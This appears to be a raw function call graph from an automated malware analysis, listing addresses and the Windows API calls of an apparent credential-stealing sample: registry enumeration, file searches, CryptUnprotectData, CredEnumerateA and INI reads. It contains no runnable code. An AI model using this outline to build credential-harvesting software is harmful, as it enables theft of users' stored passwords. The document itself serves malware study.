9816->9817 9819 401d4a 9817->9819 9820 401cdb RegQueryValueExA 9817->9820 9821 401d6c 9819->9821 9824 401c8d 2 API calls 9819->9824 9822 401d42 RegCloseKey 9820->9822 9823 401cf6 9820->9823 9821->9785 9822->9819 9823->9822 9830 4018cf LocalAlloc 9823->9830 9824->9821 9826 401d12 RegQueryValueExA 9830->9826 10038 4063c8 10037->10038 10046 406207 10037->10046 10038->8787 10039 40620e RegEnumKeyExA 10040 406237 RegCloseKey 10039->10040 10039->10046 10040->10038 10042 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10042->10046 10043 401d71 6 API calls 10043->10046 10044 4018b8 LocalFree 10044->10046 10045 4015cb lstrlen 10045->10046 10046->10039 10046->10042 10046->10043 10046->10044 10046->10045 10047 4061e4 11 API calls 10046->10047 10047->10046 10049 406147 10048->10049 10057 405f6f 10048->10057 10049->8798 10050 405f76 RegEnumKeyExA 10051 405f9f RegCloseKey 10050->10051 10050->10057 10051->10049 10053 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10053->10057 10054 401d71 6 API calls 10054->10057 10055 4018b8 LocalFree 10055->10057 10056 4015cb lstrlen 10056->10057 10057->10050 10057->10053 10057->10054 10057->10055 10057->10056 10103 405844 10058->10103 10104 401d71 6 API calls 10103->10104 10105 40585d 10104->10105 10106 401d71 6 API calls 10105->10106 10107 405873 10106->10107 10108 401d71 6 API calls 10107->10108 10109 405889 10108->10109 10110 401d71 6 API calls 10109->10110 10111 4058a1 10110->10111 10112 401d71 6 API calls 10111->10112 10113 4058b7 10112->10113 10114 401d71 6 API calls 10113->10114 10117 4058cf 10114->10117 10115 4018b8 LocalFree 10116 405978 10115->10116 10137 40594b 10117->10137 10138 4015cb 10117->10138 10123 405906 10137->10115 10139 4015d4 lstrlen 10138->10139 10140 4015de 10138->10140 10139->10140 10140->10123 10142 4015fb 10141->10142 10142->8836 10144 404e92 10143->10144 10146 404e8d 10143->10146 10145 4018b8 LocalFree 10144->10145 10147 404ffb 10145->10147 10146->10144 10148 404eb2 10146->10148 10149 404ea3 10146->10149 10147->8859 10151 401df8 5 API calls 10148->10151 10150 401df8 5 API calls 10149->10150 10152 404eb0 10150->10152 10151->10152 10153 404ed6 FindFirstFileA 10152->10153 10153->10144 10164 404ef5 10153->10164 10154 404f03 lstrcmpiA 10156 404f1a lstrcmpiA 10154->10156 10159 404f15 10154->10159 10155 404f68 StrStrIA 10157 404fcb FindNextFileA 10155->10157 10155->10164 10156->10159 10160 404fe5 FindClose 10157->10160 10157->10164 10158 401df8 5 API calls 10158->10164 10159->10157 10161 401df8 5 API calls 10159->10161 10163 401e4c 6 API calls 10159->10163 10166 404e73 24 API calls 10159->10166 10170 4018b8 LocalFree 10159->10170 10160->10144 10161->10159 10162 401e4c 6 API calls 10162->10164 10163->10159 10164->10154 10164->10155 10164->10158 10164->10162 10165 404fa6 StrStrIA 10164->10165 10167 404fbd 10164->10167 10165->10164 10166->10159 10169 4018b8 LocalFree 10167->10169 10182 404e5c 10167->10182 10169->10157 10170->10159 10172 401eb1 7 API calls 10171->10172 10173 405014 10172->10173 10174 40502f 10173->10174 10175 401df8 5 API calls 10173->10175 10176 404e73 31 API calls 10174->10176 10177 405026 10175->10177 10178 40503f 10176->10178 10179 4018b8 LocalFree 10177->10179 10180 4018b8 LocalFree 10178->10180 10179->10174 10181 405047 10180->10181 10181->8854 10183 40406c 16 API calls 10182->10183 10186 4041a6 41 API calls 10185->10186 10187 404367 10186->10187 10187->8875 10189 409c51 10188->10189 10190 409ca8 10188->10190 10191 401d71 6 API calls 10189->10191 10219 4018cf LocalAlloc 10190->10219 10193 409c63 10191->10193 10193->10190 10220 40242b 10193->10220 10194 409cb2 RegOpenKeyA 10195 409d38 10194->10195 10207 409cc8 10194->10207 10197 4018b8 LocalFree 10195->10197 10200 409d40 10197->10200 10198 409ccf RegEnumKeyExA 10201 409cf4 RegCloseKey 10198->10201 10198->10207 10200->8871 10201->10195 10202 409ca3 10205 4018b8 LocalFree 10202->10205 10204 401df8 5 API calls 10204->10207 10205->10190 10206 401eb1 7 API calls 10208 409c7c 10206->10208 10207->10198 10207->10204 10209 401e4c 6 API calls 10207->10209 10211 409c3c 79 API calls 10207->10211 10215 4018b8 LocalFree 10207->10215 10209->10207 10211->10207 10215->10207 10219->10194 10221 401df8 5 API calls 10220->10221 10222 40243a lstrlen 10221->10222 10223 402458 StrStrIA 10222->10223 10224 402449 10222->10224 10225 402467 10223->10225 10226 40246b StrRChrIA 10223->10226 10224->10223 10225->10226 10227 402479 lstrlen 10226->10227 10229 40248c 10227->10229 10229->10202 10229->10206 10414 401eb1 7 API calls 10413->10414 10423 404351 41 API calls 10422->10423 10424 405c84 10423->10424 10425 404351 41 API calls 10424->10425 10426 405c99 10425->10426 10426->8898 10428 40e254 10427->10428 10429 40e37c 10427->10429 10430 401d71 6 API calls 10428->10430 10429->8919 10431 40e266 10430->10431 10432 401d71 6 API calls 10431->10432 10433 40e27b 10432->10433 10434 401d71 6 API calls 10433->10434 10435 40e292 10434->10435 10436 401d71 6 API calls 10435->10436 10437 40e2a7 10436->10437 10438 401d71 6 API calls 10437->10438 10442 40e2bc 10438->10442 10439 40e34c 10440 4018b8 LocalFree 10439->10440 10441 40e354 10440->10441 10443 4018b8 LocalFree 10441->10443 10442->10439 10470 4043dc 10442->10470 10444 40e35c 10443->10444 10451 40e2ef 10451->10439 10453 4015cb lstrlen 10451->10453 10461 40e445 10460->10461 10466 40e3a0 10460->10466 10461->8923 10462 40e3a7 RegEnumValueA 10463 40e3d5 RegCloseKey 10462->10463 10462->10466 10463->10461 10465 401d71 6 API calls 10465->10466 10466->10462 10466->10465 10467 40e402 StrStrIA 10466->10467 10469 4018b8 LocalFree 10466->10469 10476 40e0fe 10466->10476 10467->10466 10469->10466 10471 404461 10470->10471 10472 404405 10470->10472 10471->10451 10472->10471 10473 404422 CryptUnprotectData 10472->10473 10473->10471 10475 404432 10473->10475 10475->10471 10477 401f36 2 API calls 10476->10477 10478 40e10d 10477->10478 10479 40e111 10478->10479 10480 401ffd 7 API calls 10478->10480 10479->10466 10481 40e122 10480->10481 10482 40e230 10481->10482 10496 4018cf LocalAlloc 10481->10496 10482->10466 10484 40e14b StrStrA 10485 40e15f lstrlen StrStrA 10484->10485 10487 40e15a 10484->10487 10486 40e184 lstrlen 10485->10486 10485->10487 10494 40e132 10486->10494 10489 4018b8 LocalFree 10487->10489 10488 402a1d 3 API calls 10488->10494 10490 40e227 10489->10490 10492 4018b8 LocalFree 10492->10494 10493 4043dc 2 API calls 10493->10494 10494->10484 10494->10487 10494->10488 10494->10492 10494->10493 10495 4015cb lstrlen 10494->10495 10495->10494 10496->10494 10498 401eb1 7 API calls 10497->10498 10499 405df3 10498->10499 10500 405e45 10499->10500 10501 401e4c 6 API calls 10499->10501 10500->8929 10502 405e02 10501->10502 10503 404351 41 API calls 10502->10503 10504 405e18 10503->10504 10505 404351 41 API calls 10504->10505 10506 405e2c 10505->10506 10507 404351 41 API calls 10506->10507 10508 405e40 10507->10508 10509 4018b8 LocalFree 10508->10509 10509->10500 10534 4018cf LocalAlloc 10510->10534 10512 40ea0c RegOpenKeyA 10513 40eb34 10512->10513 10524 40ea29 10512->10524 10514 4018b8 LocalFree 10513->10514 10516 40eb3f 10514->10516 10515 40ea30 RegEnumKeyExA 10517 40ea59 RegCloseKey 10515->10517 10515->10524 10516->8945 10517->10513 10519 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10519->10524 10520 401d71 6 API calls 10520->10524 10521 401df8 5 API calls 10523 40eaba GetPrivateProfileStringA 10521->10523 10522 40e9f9 45 API calls 10522->10524 10523->10524 10524->10515 10524->10519 10524->10520 10524->10521 10524->10522 10525 4018b8 LocalFree 10524->10525 10526 404351 41 API calls 10524->10526 10525->10524 10526->10524 10535 40436b 10527->10535 10530 40436b 46 API calls 10531 4043c5 10530->10531 10532 40436b 46 API calls 10531->10532 10533 4043d8 10532->10533 10534->10512 10536 401eb1 7 API calls 10535->10536 10537 404376 10536->10537 10538 404398 10537->10538 10539 401e4c 6 API calls 10537->10539 10538->10530 10540 404383 10539->10540 10541 404351 41 API calls 10540->10541 10542 404393 10541->10542 10543 4018b8 LocalFree 10542->10543 10543->10538 10545 401eb1 7 API calls 10544->10545 10546 408c2c 10545->10546 10547 408c3f 10546->10547 10574 408ae5 10546->10574 10547->8953 10550 4018b8 LocalFree 10550->10547 10552 408980 10551->10552 10554 40897b 10551->10554 10553 4018b8 LocalFree 10552->10553 10555 408ae1 10553->10555 10554->10552 10556 4089a0 10554->10556 10557 408991 10554->10557 10555->8967 10559 401df8 5 API calls 10556->10559 10558 401df8 5 API calls 10557->10558 10560 40899e 10558->10560 10559->10560 10561 4089c4 FindFirstFileA 10560->10561 10561->10552 10575 408b04 10574->10575 10576 408aff 10574->10576 10578 4018b8 LocalFree 10575->10578 10576->10575 10577 401df8 5 API calls 10576->10577 10579 408b16 10577->10579 10580 408c1d 10578->10580 10581 408b2d FindFirstFileA 10579->10581 10580->10550 10581->10575 10586 408b4c 10581->10586 10582 408bed FindNextFileA 10584 408c07 FindClose 10582->10584 10582->10586 10583 408b5e lstrcmpiA 10585 408b78 lstrcmpiA 10583->10585 10583->10586 10584->10575 10585->10586 10586->10582 10586->10583 10587 401df8 5 API calls 10586->10587 10588 401e4c 6 API calls 10586->10588 10587->10586 10589 408bba StrStrIA 10588->10589 10590 408bd5 10589->10590 10591 408be8 10589->10591 10592 408961 38 API calls 10590->10592 10593 4018b8 LocalFree 10591->10593 10592->10591 10593->10582 10680 401eb1 7 API calls 10679->10680 10681 405328 10680->10681 10682 4053bf 10681->10682 10683 401df8 5 API calls 10681->10683 10682->8989 10684 405340 10683->10684 10685 4051e3 29 API calls 10684->10685 10686 40534f 10685->10686 10687 4018b8 LocalFree 10686->10687 10688 405354 10687->10688 10689 401df8 5 API calls 10688->10689 10690 405361 10689->10690 10691 4051e3 29 API calls 10690->10691 10692 405370 10691->10692 10693 4018b8 LocalFree 10692->10693 10694 405375 10693->10694 10695 401df8 5 API calls 10694->10695 10709 401d71 6 API calls 10708->10709 10711 4051bd 10709->10711 10710 4051df 10710->8999 10711->10710 10712 4018b8 LocalFree 10711->10712 10712->10710 10714 4051fd 10713->10714 10715 405202 10713->10715 10714->10715 10717 401df8 5 API calls 10714->10717 10716 4018b8 LocalFree 10715->10716 10718 405316 10716->10718 10719 405212 10717->10719 10718->8986 10737 405182 10719->10737 10722 4018b8 LocalFree 10723 405221 10722->10723 10724 401df8 5 API calls 10723->10724 10725 40522e 10724->10725 10726 405245 FindFirstFileA 10725->10726 10726->10715 10727 405264 10726->10727 10728 405272 lstrcmpiA 10727->10728 10729 4052e6 FindNextFileA 10727->10729 10731 40528c lstrcmpiA 10728->10731 10735 40528a 10728->10735 10729->10727 10730 405300 FindClose 10729->10730 10730->10715 10731->10735 10732 401df8 5 API calls 10732->10735 10733 401e4c 6 API calls 10733->10735 10734 405182 16 API calls 10734->10735 10735->10729 10735->10732 10735->10733 10735->10734 10736 4018b8 LocalFree 10735->10736 10736->10729 10738 40406c 16 API calls 10737->10738 10739 405195 10738->10739 10739->10722 10741 40f717 10740->10741 10742 40f6fd 10740->10742 10744 40f30d RegOpenKeyA 10741->10744 10742->10741 10764 40a45e 10742->10764 10745 40f3a8 10744->10745 10746 40f329 10744->10746 10745->9025 10747 40f330 RegEnumKeyExA 10746->10747 10750 401df8 5 API calls 10746->10750 10751 401e4c 6 API calls 10746->10751 10753 4018b8 LocalFree 10746->10753 10777 40f178 10746->10777 10747->10746 10748 40f359 RegCloseKey 10747->10748 10748->10745 10750->10746 10751->10746 10753->10746 10755 40f452 10754->10755 10761 40f3cc 10754->10761 10755->9029 10756 40f3d3 RegEnumKeyExA 10757 40f3fc RegCloseKey 10756->10757 10756->10761 10757->10755 10759 401df8 5 API calls 10759->10761 10760 401e4c 6 API calls 10760->10761 10761->10756 10761->10759 10761->10760 10762 40f30d 23 API calls 10761->10762 10763 4018b8 LocalFree 10761->10763 10762->10761 10763->10761 10767 40a47e 10764->10767 10765 40a4d3 10765->10741 10767->10765 10768 40a3c8 10767->10768 10770 40a3eb 10768->10770 10769 40a448 10769->10767 10770->10769 10772 40a342 10770->10772 10773 40a34f 10772->10773 10775 40a354 10772->10775 10773->10770 10774 40a3b8 10774->10770 10775->10774 10776 40a3a7 CoTaskMemFree 10775->10776 10776->10775 10779 40f188 10777->10779 10778 401d71 6 API calls 10778->10779 10779->10778 10781 4018b8 LocalFree 10779->10781 10785 40f1c4 10779->10785 10796 40f12e 10779->10796 10781->10779 10782 401d71 6 API calls 10782->10785 10783 401d71 6 API calls 10789 40f21b 10783->10789 10784 4015cb lstrlen 10784->10785 10785->10782 10785->10784 10787 4018b8 LocalFree 10785->10787 10785->10789 10786 40f29c 10790 401d71 6 API calls 10786->10790 10793 40f2f3 10786->10793 10794 4015cb lstrlen 10786->10794 10795 4018b8 LocalFree 10786->10795 10787->10785 10788 4018b8 LocalFree 10788->10789 10789->10783 10789->10786 10789->10788 10791 40f12e 6 API calls 10789->10791 10792 4043dc 2 API calls 10789->10792 10790->10786 10791->10789 10792->10789 10793->10746 10794->10786 10795->10786 10805 402abb 10796->10805 10798 40f16f 10798->10779 10799 40f13f 10799->10798 10800 4015cb lstrlen 10799->10800 10801 40f15c 10800->10801 10802 4015cb lstrlen 10801->10802 10803 40f167 10802->10803 10804 4018b8 LocalFree 10803->10804 10804->10798 10806 402ac4 10805->10806 10807 402aca 10805->10807 10806->10807 10808 402ad0 IsTextUnicode 10806->10808 10807->10799 10809 402af1 10808->10809 10810 402ae1 10808->10810 10824 4018cf LocalAlloc 10809->10824 10814 402a3e 10810->10814 10813 402aef 10813->10799 10815 402a52 WideCharToMultiByte 10814->10815 10816 402a4b 10814->10816 10817 402a6f 10815->10817 10823 402aa1 10815->10823 10816->10813 10825 4018cf LocalAlloc 10817->10825 10819 402a7a 10820 402a7e WideCharToMultiByte 10819->10820 10819->10823 10820->10823 10823->10813 10824->10813 10825->10819 10827 406d72 10826->10827 10828 406f3f 10826->10828 10829 406d79 RegEnumKeyExA 10827->10829 10832 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10827->10832 10833 401d71 6 API calls 10827->10833 10834 4043dc 2 API calls 10827->10834 10835 4018b8 LocalFree 10827->10835 10836 4015cb lstrlen 10827->10836 10828->9049 10829->10827 10830 406da2 RegCloseKey 10829->10830 10830->10828 10832->10827 10833->10827 10834->10827 10835->10827 10836->10827 10838 401f36 2 API calls 10837->10838 10839 406fca 10838->10839 10840 406fd3 10839->10840 10841 406fce 10839->10841 10842 401ffd 7 API calls 10840->10842 10841->9072 10863->9098 10864->9106 10866 40eeaa 10865->10866 10871 40ebc3 10865->10871 10866->9133 10867 40ebca RegEnumKeyExA 10868 40ebf3 RegCloseKey 10867->10868 10867->10871 10868->10866 10870 401df8 5 API calls 10870->10871 10871->10867 10871->10870 10872 401e4c 6 API calls 10871->10872 10873 401d71 6 API calls 10871->10873 10874 40eba3 15 API calls 10871->10874 10875 4015cb lstrlen 10871->10875 10876 4018b8 LocalFree 10871->10876 10872->10871 10873->10871 10874->10871 10875->10871 10876->10871 10878 40a944 10877->10878 10882 40a89a 10877->10882 10879 40a712 17 API calls 10878->10879 10880 40a969 10879->10880 10886 40a96d 10880->10886 10881 40a8fc StrStrIW 10881->10882 10882->10878 10882->10881 10895 40a712 lstrlenW 10882->10895 10884 40a92c CoTaskMemFree 10884->10882 10885 40a93a CoTaskMemFree 10884->10885 10885->10882 10887 40a97d 10886->10887 10888 40aaa3 10887->10888 10889 40a9c2 CredEnumerateA 10887->10889 10888->9141 10889->10888 10892 40a9ed 10889->10892 10890 40aa9a CredFree 10890->10888 10891 40aa09 lstrlenW CryptUnprotectData 10891->10892 10892->10888 10892->10890 10892->10891 10893 40aa7c LocalFree 10892->10893 10921 40a522 10892->10921 10893->10892 10896 40a725 10895->10896 10901 40a72a 10895->10901 10896->10884 10897 40a788 wsprintfA 10900 401e4c 6 API calls 10897->10900 10898 40a75b wsprintfA 10899 401e4c 6 API calls 10898->10899 10899->10901 10902 40a7af 10900->10902 10901->10897 10901->10898 10903 401d71 6 API calls 10902->10903 10904 40a7c9 10903->10904 10905 40a868 10904->10905 10907 40a860 10904->10907 10908 40a7de lstrlenW 10904->10908 10906 4018b8 LocalFree 10905->10906 10911 40a870 10906->10911 10910 4018b8 LocalFree 10907->10910 10908->10907 10909 40a810 CryptUnprotectData 10908->10909 10909->10907 10912 40a82e 10909->10912 10910->10905 10911->10884 10912->10907 10915 40a4e9 10912->10915 10919 401569 10915->10919 10917 40a4f7 lstrlenW 10920 40157a 10919->10920 10920->10917 10922 401569 10921->10922 10923 40a530 lstrlen 10922->10923 10924 40a545 10923->10924 10924->10893 10926 408120 10925->10926 10935 407f2c 10925->10935 10926->9151 10927 407f33 RegEnumKeyExA 10928 407f5c RegCloseKey 10927->10928 10927->10935 10928->10926 10930 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10930->10935 10931 401d71 6 API calls 10931->10935 10932 4018b8 LocalFree 10932->10935 10933 4015cb lstrlen 10933->10935 10934 407f0c 11 API calls 10934->10935 10935->10927 10935->10930 10935->10931 10935->10932 10935->10933 10935->10934 10937 401eb1 7 API calls 10936->10937 10938 40d970 10937->10938 10939 40d99d 10938->10939 10940 401e4c 6 API calls 10938->10940 10939->9201 10941 40d97f 10940->10941 10942 4041a6 41 API calls 10941->10942 10943 40d998 10942->10943 10944 4018b8 LocalFree 10943->10944 10944->10939 10946 407e1c 10945->10946 10952 407bda 10945->10952 10946->9215 10947 407be1 RegEnumKeyExA 10948 407c0a RegCloseKey 10947->10948 10947->10952 10948->10946 10950 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10950->10952 10951 401d71 6 API calls 10951->10952 10952->10947 10952->10950 10952->10951 10953 4015cb lstrlen 10952->10953 10954 407bba 11 API calls 10952->10954 10955 4018b8 LocalFree 10952->10955 10953->10952 10954->10952 10955->10952 10957 401eb1 7 API calls 10956->10957 10958 408fde 10957->10958 10959 40901b 10958->10959 10960 401e4c 6 API calls 10958->10960 10959->9233 10961 408fed 10960->10961 10962 404351 41 API calls 10961->10962 10963 409002 10962->10963 10964 404351 41 API calls 10963->10964 10965 409016 10964->10965 10966 4018b8 LocalFree 10965->10966 10966->10959 10968 40cd66 10967->10968 10969 40ccea 10967->10969 10968->9249 10969->10968 10970 40ccfc CredEnumerateA 10969->10970 10970->10968 10971 40cd23 10970->10971 10971->10968 10972 40cd5d CredFree 10971->10972 10974 40cc29 10971->10974 10972->10968 10975 40cc3c 10974->10975 10976 4015cb lstrlen 10975->10976 10977 40cc47 10976->10977 10978 4015cb lstrlen 10977->10978 10979 40cc52 10978->10979 10980 40cc60 StrStrIA 10979->10980 10981 40cc71 lstrlen StrStrIA 10980->10981 10986 40ccbd 10980->10986 10982 40cc8f 10981->10982 10983 4037c6 2 API calls 10982->10983 10984 40cc9d 10983->10984 10985 4015cb lstrlen 10984->10985 10984->10986 10985->10986 10986->10971 10988 40de97 10987->10988 10995 40dc82 10987->10995 10988->9259 10989 40dc89 RegEnumKeyExA 10990 40dcb2 RegCloseKey 10989->10990 10989->10995 10990->10988 10992 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10992->10995 10993 401d71 6 API calls 10993->10995 10994 40dc62 11 API calls 10994->10995 10995->10989 10995->10992 10995->10993 10995->10994 10996 4015cb lstrlen 10995->10996 10997 4018b8 LocalFree 10995->10997 10996->10995 10997->10995 10999 401d71 6 API calls 10998->10999 11000 40e878 10999->11000 11001 40e897 11000->11001 11005 40e811 11000->11005 11001->9264 11004 4018b8 LocalFree 11004->11001 11012 40e7db 11005->11012 11008 40e7db 46 API calls 11009 40e842 11008->11009 11010 40e7db 46 API calls 11009->11010 11011 40e859 11010->11011 11011->11004 11013 401eb1 7 API calls 11012->11013 11014 40e7e6 11013->11014 11015 40e80d 11014->11015 11016 401e4c 6 API calls 11014->11016 11015->11008 11017 40e7f3 11016->11017 11018 4041a6 41 API calls 11017->11018 11019 40e808 11018->11019 11020 4018b8 LocalFree 11019->11020 11020->11015 11022 40d792 11021->11022 11028 40d5e3 11021->11028 11022->9268 11023 40d5ea RegEnumKeyExA 11024 40d613 RegCloseKey 11023->11024 11023->11028 11024->11022 11026 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11026->11028 11027 401d71 6 API calls 11027->11028 11028->11023 11028->11026 11028->11027 11029 40d5c0 11 API calls 11028->11029 11030 4018b8 LocalFree 11028->11030 11031 4015cb lstrlen 11028->11031 11029->11028 11030->11028 11031->11028 11033 406911 11032->11033 11038 4066b2 11032->11038 11033->9290 11034 4066b9 RegEnumKeyExA 11035 4066e2 RegCloseKey 11034->11035 11034->11038 11035->11033 11037 401df8 5 API calls 11037->11038 11038->11034 11038->11037 11039 401e4c 6 API calls 11038->11039 11040 401d71 6 API calls 11038->11040 11041 4043dc 2 API calls 11038->11041 11042 4018b8 LocalFree 11038->11042 11043 4015cb lstrlen 11038->11043 11039->11038 11040->11038 11041->11038 11042->11038 11043->11038 11045 404a91 11044->11045 11053 40493e 11044->11053 11045->9297 11046 404945 RegEnumKeyExA 11047 40496e RegCloseKey 11046->11047 11046->11053 11047->11045 11049 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11049->11053 11050 401d71 6 API calls 11050->11053 11051 4018b8 LocalFree 11051->11053 11052 4015cb lstrlen 11052->11053 11053->11046 11053->11049 11053->11050 11053->11051 11053->11052 11054 40491b 11 API calls 11053->11054 11054->11053 11056 404917 11055->11056 11061 404830 11055->11061 11056->9303 11057 404837 RegEnumValueA 11058 404865 RegCloseKey 11057->11058 11057->11061 11058->11056 11060 404881 StrStrIA 11060->11061 11061->11057 11061->11060 11062 401d71 6 API calls 11061->11062 11063 4018b8 LocalFree 11061->11063 11062->11061 11063->11061 11065 401d71 6 API calls 11064->11065 11066 40ef86 11065->11066 11067 40efa0 11066->11067 11092 40eef7 11066->11092 11069 401d71 6 API calls 11067->11069 11071 40efb4 11069->11071 11072 40efce 11071->11072 11074 40eef7 41 API calls 11071->11074 11075 401d71 6 API calls 11072->11075 11076 40efc6 11074->11076 11077 40efe2 11075->11077 11078 4018b8 LocalFree 11076->11078 11078->11072 11093 404351 41 API calls 11092->11093 11094 40ef12 11093->11094 11095 404351 41 API calls 11094->11095 11096 40ef27 11095->11096 11106 40b00e 11105->11106 11115 40aefa 11105->11115 11106->9328 11107 40af01 RegEnumKeyExA 11108 40af2a RegCloseKey 11107->11108 11107->11115 11108->11106 11110 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11110->11115 11111 4018b8 LocalFree 11111->11115 11112 401d71 6 API calls 11112->11115 11113 40aed7 21 API calls 11113->11115 11115->11107 11115->11110 11115->11111 11115->11112 11115->11113 11116 40ac3e 11115->11116 11179 4018cf LocalAlloc 11116->11179 11118 40ac4e 11180 4018cf LocalAlloc 11118->11180 11120 40ac5b 11181 4018cf LocalAlloc 11120->11181 11122 40ac68 11182 4018cf LocalAlloc 11122->11182 11124 40ac75 11183 4018cf LocalAlloc 11124->11183 11126 40ac82 11184 4018cf LocalAlloc 11126->11184 11128 40ac8f 11185 4018cf LocalAlloc 11128->11185 11130 40ac9c 7 API calls 11179->11118 11180->11120 11181->11122 11182->11124 11183->11126 11184->11128 11185->11130 11194 407585 11193->11194 11201 4073c7 11193->11201 11194->9351 11195 4073ce RegEnumKeyExA 11196 4073f7 RegCloseKey 11195->11196 11195->11201 11196->11194 11198 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11198->11201 11199 4018b8 LocalFree 11199->11201 11200 401d71 6 API calls 11200->11201 11201->11195 11201->11198 11201->11199 11201->11200 11202 4015cb lstrlen 11201->11202 11203 4073a7 11 API calls 11201->11203 11202->11201 11203->11201 11205 407681 11204->11205 11211 4075f2 11204->11211 11205->9401 11206 4075f9 RegEnumValueA 11207 407622 RegCloseKey 11206->11207 11206->11211 11207->11205 11209 401d71 6 API calls 11209->11211 11210 4018b8 LocalFree 11210->11211 11211->11206 11211->11209 11211->11210 11213 401d71 6 API calls 11212->11213 11214 405ea5 11213->11214 11215 405ebe 11214->11215 11216 404351 41 API calls 11214->11216 11217 401d71 6 API calls 11215->11217 11218 405eb9 11216->11218 11219 405ed4 11217->11219 11220 4018b8 LocalFree 11218->11220 11221 405eed 11219->11221 11222 404351 41 API calls 11219->11222 11220->11215 11223 40439c 46 API calls 11221->11223 11225 405ee8 11222->11225 11224 405f00 11223->11224 11224->9411 11226 4018b8 LocalFree 11225->11226 11226->11221 11228 401eb1 7 API calls 11227->11228 11229 407a3e 11228->11229 11230 407a7b 11229->11230 11231 401e4c 6 API calls 11229->11231 11230->9430 11232 407a4d 11231->11232 11233 404351 41 API calls 11232->11233 11234 407a62 11233->11234 11235 404351 41 API calls 11234->11235 11236 407a76 11235->11236 11237 4018b8 LocalFree 11236->11237 11237->11230 11239 407a2f 11238->11239 11245 4078e8 11238->11245 11239->9438 11240 4078ef RegEnumKeyExA 11241 407918 RegCloseKey 11240->11241 11240->11245 11241->11239 11243 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11243->11245 11244 401d71 6 API calls 11244->11245 11245->11240 11245->11243 11245->11244 11246 404351 41 API calls 11245->11246 11247 4018b8 LocalFree 11245->11247 11248 4078c8 45 API calls 11245->11248 11246->11245 11247->11245 11248->11245 11250 4044c8 11249->11250 11251 40448a GetProcAddress 11249->11251 11250->9454 11251->11250 11252 404499 GetProcAddress 11251->11252 11252->11250 11253 4044aa GetCurrentProcess 11252->11253 11254 4044b8 11253->11254 11254->9454 11254->11250 11255->9456 11257 4015ad 11256->11257 11257->9458 11259 4044e1 11258->11259 11260 4044f3 11258->11260 11259->11260 11261 4044fa AllocateAndInitializeSid 11259->11261 11260->9461 11262 40453b 11261->11262 11263 40453d CheckTokenMembership 11261->11263 11262->9461 11264 404557 11263->11264 11265 40455e FreeSid 11263->11265 11264->11265 11265->9461 11267 4027f7 18 API calls 11266->11267 11268 404580 11267->11268 11298 401eb1 7 API calls 11297->11298 11299 40c68a 11298->11299 11300 40c6b7 11299->11300 11302 401e4c 6 API calls 11299->11302 11301 401eb1 7 API calls 11300->11301 11303 40c6bf 11301->11303 11304 40c699 11302->11304 11305 40c6ec 11303->11305 11307 401e4c 6 API calls 11303->11307 11306 4041a6 41 API calls 11304->11306 11305->9493 11308 40c6b2 11306->11308 11310 40c6ce 11307->11310 11309 4018b8 LocalFree 11308->11309 11309->11300 11311 4041a6 41 API calls 11310->11311 11312 40c6e7 11311->11312 11313 4018b8 LocalFree 11312->11313 11313->11305 11315 401d71 6 API calls 11314->11315 11316 4054de 11315->11316 11317 40553e 11316->11317 11318 401df8 5 API calls 11316->11318 11317->9505 11319 4054f2 11318->11319 11342 4054a5 11319->11342 11322 401df8 5 API calls 11323 40550d 11322->11323 11324 4054a5 16 API calls 11323->11324 11325 40551b 11324->11325 11326 401df8 5 API calls 11325->11326 11327 405528 11326->11327 11328 4054a5 16 API calls 11327->11328 11329 405536 11328->11329 11330 4018b8 LocalFree 11329->11330 11330->11317 11343 4054c4 11342->11343 11344 4054ae 11342->11344 11343->11322 11345 40406c 16 API calls 11344->11345 11346 4054bc 11345->11346 11347 4018b8 LocalFree 11346->11347 11347->11343 11362 401eb1 7 API calls 11361->11362 11363 40c73d 11362->11363 11364 40c765 11363->11364 11365 401e4c 6 API calls 11363->11365 11364->9549 11366 40c74c 11365->11366 11367 404351 41 API calls 11366->11367 11368 40c760 11367->11368 11369 4018b8 LocalFree 11368->11369 11369->11364 11371 406cdf 11370->11371 11379 406b3e 11370->11379 11371->9566 11372 406b45 RegEnumKeyExA 11373 406b6e RegCloseKey 11372->11373 11372->11379 11373->11371 11375 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11375->11379 11376 401d71 6 API calls 11376->11379 11377 4018b8 LocalFree 11377->11379 11378 4015cb lstrlen 11378->11379 11379->11372 11379->11375 11379->11376 11379->11377 11379->11378 11381 40735a 11380->11381 11389 40719c 11380->11389 11381->9581 11382 4071a3 RegEnumKeyExA 11383 4071cc RegCloseKey 11382->11383 11382->11389 11383->11381 11384 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11384->11389 11386 401d71 6 API calls 11386->11389 11387 4015cb lstrlen 11387->11389 11388 4018b8 LocalFree 11388->11389 11389->11382 11389->11384 11389->11386 11389->11387 11389->11388 11390 40717c 11 API calls 11389->11390 11390->11389 11392 40665a 11391->11392 11401 406420 11391->11401 11392->9586 11393 406427 RegEnumKeyExA 11394 406450 RegCloseKey 11393->11394 11393->11401 11394->11392 11396 401df8 5 API calls 11396->11401 11397 401e4c 6 API calls 11397->11401 11398 401d71 6 API calls 11398->11401 11399 4015cb lstrlen 11399->11401 11400 4018b8 LocalFree 11400->11401 11401->11393 11401->11396 11401->11397 11401->11398 11401->11399 11401->11400 11403 40dbda 11402->11403 11408 40da1a 11402->11408 11403->9591 11404 40da21 RegEnumKeyExA 11405 40da4a RegCloseKey 11404->11405 11404->11408 11405->11403 11407 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11407->11408 11408->11404 11408->11407 11409 401d71 6 API calls 11408->11409 11410 40d9fa 11 API calls 11408->11410 11411 4015cb lstrlen 11408->11411 11412 4018b8 LocalFree 11408->11412 11409->11408 11410->11408 11411->11408 11412->11408 11414 40d2c7 11413->11414 11422 40d092 11413->11422 11414->9609 11415 40d099 RegEnumKeyExA 11416 40d0c2 RegCloseKey 11415->11416 11415->11422 11416->11414 11418 401df8 LocalAlloc 